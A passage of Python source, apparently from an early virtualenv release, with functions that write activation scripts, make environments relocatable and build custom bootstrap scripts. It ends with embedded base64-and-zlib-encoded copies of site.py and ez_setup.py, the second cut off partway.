                      'your %s file.' % pydistutils)
    ## FIXME: really this should be calculated earlier
    return py_executable
def install_activate(home_dir, bin_dir):
    """Write the activation scripts for this platform into ``bin_dir``,
    with the environment's path and name substituted in."""
    on_windows = sys.platform == 'win32' or is_jython and os._name == 'nt'
    if on_windows:
        scripts = {'activate.bat': ACTIVATE_BAT,
                   'deactivate.bat': DEACTIVATE_BAT}
        under_cygwin = (os.environ.get('OS') == 'Windows_NT'
                        and os.environ.get('OSTYPE') == 'cygwin')
        if under_cygwin:
            scripts['activate'] = ACTIVATE_SH
    else:
        scripts = {'activate': ACTIVATE_SH}
    scripts['activate_this.py'] = ACTIVATE_THIS
    # Substitutions are the same for every script; compute them once.
    env_path = os.path.abspath(home_dir)
    env_name = os.path.basename(env_path)
    script_dir_name = os.path.basename(bin_dir)
    for script_name, template in scripts.items():
        body = template.replace('__VIRTUAL_ENV__', env_path)
        body = body.replace('__VIRTUAL_NAME__', env_name)
        body = body.replace('__BIN_NAME__', script_dir_name)
        writefile(os.path.join(bin_dir, script_name), body)
def install_distutils(lib_dir, home_dir):
    """Install the patched ``distutils`` package and its default
    ``distutils.cfg`` into the environment's library directory."""
    pkg_dir = os.path.join(lib_dir, 'distutils')
    mkdir(pkg_dir)
    ## FIXME: maybe this prefix setting should only be put in place if
    ## there's a local distutils.cfg with a prefix setting?
    home_dir = os.path.abspath(home_dir)
    ## FIXME: this is breaking things, removing for now:
    #distutils_cfg = DISTUTILS_CFG + "\n[install]\nprefix=%s\n" % home_dir
    writefile(os.path.join(pkg_dir, '__init__.py'), DISTUTILS_INIT)
    cfg_path = os.path.join(pkg_dir, 'distutils.cfg')
    writefile(cfg_path, DISTUTILS_CFG, overwrite=False)
def fix_lib64(lib_dir):
    """
    Some platforms (notably Gentoo on x64) keep libraries under
    lib64/pythonX.Y rather than lib/pythonX.Y.  When the interpreter's
    build configuration mentions lib64, mirror lib as lib64 so both
    spellings resolve.
    """
    config_values = distutils.sysconfig.get_config_vars().values()
    lib64_values = [v for v in config_values
                    if isinstance(v, basestring) and 'lib64' in v]
    if not lib64_values:
        return
    logger.debug('This system uses lib64; symlinking lib64 to lib')
    assert os.path.basename(lib_dir) == 'python%s' % sys.version[:3], (
        "Unexpected python lib dir: %r" % lib_dir)
    lib_parent = os.path.dirname(lib_dir)
    assert os.path.basename(lib_parent) == 'lib', (
        "Unexpected parent dir: %r" % lib_parent)
    copyfile(lib_parent, os.path.join(os.path.dirname(lib_parent), 'lib64'))
def resolve_interpreter(exe):
    """
    Resolve ``exe`` to an interpreter path, searching $PATH when the
    given name is not already absolute.  Exits with status 3 when no
    matching executable exists.
    """
    if os.path.abspath(exe) != exe:
        # Relative name: take the first $PATH entry that contains it.
        for directory in os.environ.get('PATH', '').split(os.pathsep):
            candidate = os.path.join(directory, exe)
            if os.path.exists(candidate):
                exe = candidate
                break
    if not os.path.exists(exe):
        logger.fatal('The executable %s (from --python=%s) does not exist' % (exe, exe))
        sys.exit(3)
    return exe
############################################################
## Relocating the environment:
def make_environment_relocatable(home_dir):
    """
    Rewrite an existing environment so that it uses relative paths, and
    strip the #!-based interpreter selection out of its scripts.
    """
    # activate_this.py is required by the relative shebang replacement.
    marker = os.path.join(home_dir, 'bin', 'activate_this.py')
    if not os.path.exists(marker):
        logger.fatal(
            'The environment doesn\'t have a file %s -- please re-run virtualenv '
            'on this environment to update it' % marker)
    fixup_scripts(home_dir)
    fixup_pth_and_egg_link(home_dir)
    ## FIXME: need to fix up distutils.cfg
# Scripts whose #! lines are allowed to remain absolute when an
# environment is made relocatable (see fixup_scripts).
OK_ABS_SCRIPTS = ['python', 'python%s' % sys.version[:3],
                  'activate', 'activate.bat', 'activate_this.py']
def fixup_scripts(home_dir):
    # Rewrite each script in the environment's bin/ directory so that its
    # shebang no longer hard-codes this environment's absolute path.
    # This is what we expect at the top of scripts:
    shebang = '#!%s/bin/python' % os.path.normcase(os.path.abspath(home_dir))
    # This is what we'll put:
    new_shebang = '#!/usr/bin/env python%s' % sys.version[:3]
    # Second line injected into every rewritten script: activates the
    # environment at runtime, so the generic interpreter resolves here.
    activate = "import os; activate_this=os.path.join(os.path.dirname(__file__), 'activate_this.py'); execfile(activate_this, dict(__file__=activate_this)); del os, activate_this"
    bin_dir = os.path.join(home_dir, 'bin')
    for filename in os.listdir(bin_dir):
        filename = os.path.join(bin_dir, filename)
        if not os.path.isfile(filename):
            # ignore subdirs, e.g. .svn ones.
            continue
        f = open(filename, 'rb')
        lines = f.readlines()
        f.close()
        if not lines:
            logger.warn('Script %s is an empty file' % filename)
            continue
        if not lines[0].strip().startswith(shebang):
            # Not one of ours: either explicitly exempt, already converted,
            # or a foreign script we leave untouched.
            if os.path.basename(filename) in OK_ABS_SCRIPTS:
                logger.debug('Cannot make script %s relative' % filename)
            elif lines[0].strip() == new_shebang:
                logger.info('Script %s has already been made relative' % filename)
            else:
                logger.warn('Script %s cannot be made relative (it\'s not a normal script that starts with %s)'
                            % (filename, shebang))
            continue
        logger.notify('Making script %s relative' % filename)
        # Replace the shebang and insert the self-activation line.
        lines = [new_shebang+'\n', activate+'\n'] + lines[1:]
        f = open(filename, 'wb')
        f.writelines(lines)
        f.close()
def fixup_pth_and_egg_link(home_dir, sys_path=None):
    """Makes .pth and .egg-link files use relative paths"""
    home_dir = os.path.normcase(os.path.abspath(home_dir))
    if sys_path is None:
        sys_path = sys.path
    for entry in sys_path:
        if not entry:
            entry = '.'
        if not os.path.isdir(entry):
            continue
        entry = os.path.normcase(os.path.abspath(entry))
        if not entry.startswith(home_dir):
            # Only directories inside the environment are rewritten.
            logger.debug('Skipping system (non-environment) directory %s' % entry)
            continue
        for name in os.listdir(entry):
            full = os.path.join(entry, name)
            if full.endswith('.pth'):
                if os.access(full, os.W_OK):
                    fixup_pth_file(full)
                else:
                    logger.warn('Cannot write .pth file %s, skipping' % full)
            if full.endswith('.egg-link'):
                if os.access(full, os.W_OK):
                    fixup_egg_link(full)
                else:
                    logger.warn('Cannot write .egg-link file %s, skipping' % full)
def fixup_pth_file(filename):
    """Rewrite the absolute path entries of a .pth file as relative ones."""
    f = open(filename)
    original = f.readlines()
    f.close()
    rewritten = []
    for raw in original:
        entry = raw.strip()
        # Blank lines, comments, import lines, and already-relative
        # entries pass through unchanged (modulo stripping).
        keep_as_is = (not entry or entry.startswith('#')
                      or entry.startswith('import ')
                      or os.path.abspath(entry) != entry)
        if keep_as_is:
            rewritten.append(entry)
        else:
            relative = make_relative_path(filename, entry)
            if entry != relative:
                logger.debug('Rewriting path %s as %s (in %s)' % (entry, relative, filename))
            rewritten.append(relative)
    if rewritten == original:
        logger.info('No changes to .pth file %s' % filename)
        return
    logger.notify('Making paths in .pth file %s relative' % filename)
    f = open(filename, 'w')
    f.write('\n'.join(rewritten) + '\n')
    f.close()
def fixup_egg_link(filename):
    """Rewrite the single absolute path stored in an .egg-link file so it
    is relative to the file itself."""
    f = open(filename)
    target = f.read().strip()
    f.close()
    if os.path.abspath(target) != target:
        logger.debug('Link in %s already relative' % filename)
        return
    relative = make_relative_path(filename, target)
    logger.notify('Rewriting link %s in %s as %s' % (target, filename, relative))
    f = open(filename, 'w')
    f.write(relative)
    f.close()
def make_relative_path(source, dest, dest_is_directory=True):
    """
    Express ``dest`` relative to the file ``source`` that refers to it.

    >>> make_relative_path('/usr/share/something/a-file.pth',
    ...                    '/usr/share/another-place/src/Directory')
    '../another-place/src/Directory'
    >>> make_relative_path('/usr/share/something/a-file.pth',
    ...                    '/home/user/src/Directory')
    '../../../home/user/src/Directory'
    >>> make_relative_path('/usr/share/a-file.pth', '/usr/share/')
    './'
    """
    dest_filename = None
    if not dest_is_directory:
        # Relativize the containing directory, re-append the name at the end.
        dest_filename = os.path.basename(dest)
        dest = os.path.dirname(dest)
    dest = os.path.normpath(os.path.abspath(dest))
    source = os.path.normpath(os.path.abspath(os.path.dirname(source)))
    dest_parts = dest.strip(os.path.sep).split(os.path.sep)
    source_parts = source.strip(os.path.sep).split(os.path.sep)
    # Drop the prefix common to both paths.
    while dest_parts and source_parts and dest_parts[0] == source_parts[0]:
        dest_parts.pop(0)
        source_parts.pop(0)
    parts = ['..'] * len(source_parts) + dest_parts
    if dest_filename is not None:
        parts.append(dest_filename)
    if not parts:
        # Special case for the current directory (otherwise it'd be '')
        return './'
    return os.path.sep.join(parts)
############################################################
## Bootstrap script creation:
def create_bootstrap_script(extra_text, python_version=''):
    """
    Return the text of a customized bootstrap script.

    The result is this very script with ``extra_text`` (Python code)
    spliced in at the extension marker; written to disk it behaves as a
    standalone virtualenv installer.  Hooks ``extra_text`` may define:

    ``extend_parser(optparse_parser)``:
        Add or remove command-line options.

    ``adjust_options(options, args)``:
        Massage the parsed options and arguments; ``args`` must end up
        as ``[DEST_DIR]``.

    ``after_install(options, home_dir)``:
        Run arbitrary post-install steps -- the hook you most likely
        want.  For example::

            def after_install(options, home_dir):
                subprocess.call([join(home_dir, 'bin', 'easy_install'),
                                 'MyPackage'])
                subprocess.call([join(home_dir, 'bin', 'my-package-script'),
                                 'setup', home_dir])

    Passing ``python_version='2.4'`` makes the generated script start
    with ``#!/usr/bin/env python2.4`` instead of
    ``#!/usr/bin/env python``, pinning the interpreter it runs under.
    """
    filename = __file__
    if filename.endswith('.pyc'):
        filename = filename[:-1]
    f = open(filename, 'rb')
    content = f.read()
    f.close()
    py_exe = 'python%s' % python_version
    header = '#!/usr/bin/env %s\n' % py_exe
    header += '## WARNING: This file is generated\n'
    content = header + content
    # The marker is split so this source file never contains it verbatim.
    return content.replace('##EXT' 'END##', extra_text)
def adjust_options(options, args):
    # Ignore any destination given on the command line and always
    # install into ./virtual-env/.
    args[:] = ['./virtual-env/']
def after_install(options, home_dir):
    """Post-install hook: easy_install a fixed set of packages into the
    freshly created environment rooted at ``home_dir``."""
    if sys.platform == 'win32':
        bin_dir = join(home_dir, 'Scripts')
    else:
        bin_dir = join(home_dir, 'bin')
    easy_install = join(bin_dir, 'easy_install')
    # One call per requirement, in the original order, so a single
    # failure does not block the remaining installs.
    for requirement in ('paver==1.0.3', 'nose', 'Sphinx>=0.6b1',
                        'pkginfo', 'bottle', 'redis', 'virtualenv'):
        subprocess.call([easy_install, requirement])
##file site.py
SITE_PY = """
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
yBXo8FFND74JkgILcmKn2vJbYxD8H2/QG9E=
""".decode("base64").decode("zlib")
##file ez_setup.py
EZ_SETUP_PY = """
eJzNWmuP28YV/a5fwShYSIJlLt8PGXKRJi5gIEiDPAoU9lY7zxVrilRJyhu1yH/vmeFDJLVU2iIf
ysDZXXJ45z7PuXekL784nqt9ns3m8/kf87wqq4IcjVJUp2OV52lpJFlZkTQlVYJFs/fSOOcn45lk
lVHlxqkUw7XqaWEcCftEnsSirB+ax/Pa+PuprLCApScujGqflDOZpEK9Uu0hhByEwZNCsCovzsZz
